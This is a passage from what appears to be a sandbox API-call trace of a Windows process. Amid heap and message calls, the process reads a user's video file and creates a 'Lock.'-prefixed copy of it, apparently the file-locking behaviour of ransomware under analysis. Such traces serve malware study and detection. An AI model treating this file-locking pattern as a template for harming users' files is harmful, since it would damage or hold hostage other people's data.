[0258.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0258.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0258.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0258.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0258.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0258.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0258.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.588] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.588] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.589] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.589] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0258.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.589] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/EzPWeTUYQ0o54TxyD5.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ezpwetuyq0o54txyd5.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0258.589] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0258.589] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0258.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0258.590] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.590] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.590] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/Lock.EzPWeTUYQ0o54TxyD5.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lock.ezpwetuyq0o54txyd5.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0258.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0258.591] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.591] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.591] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0258.591] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0258.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.592] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0258.592] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0258.594] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x5e14, lpOverlapped=0x0) returned 1 [0258.594] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0258.596] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15e14) returned 0x24b7a48 [0258.596] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.596] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0258.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0258.597] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0258.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0258.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dc8 [0258.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15e14) returned 0x24b7a48 [0258.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16f8 [0258.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0258.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0258.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1818 [0258.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab38 [0258.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0258.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0258.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0258.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15e14) returned 0x34b2250 [0258.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0258.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0258.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0258.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0258.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0258.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0258.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0258.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0258.602] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.602] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0258.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0258.603] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.603] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0258.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0258.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0258.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.605] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.605] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.605] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.605] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.606] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.606] HeapFree (in: 